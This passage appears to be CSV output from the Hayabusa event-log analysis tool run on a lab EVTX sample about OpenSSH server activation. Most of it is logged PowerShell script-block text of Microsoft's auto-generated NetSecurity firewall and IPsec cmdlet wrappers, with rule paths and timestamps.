[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = 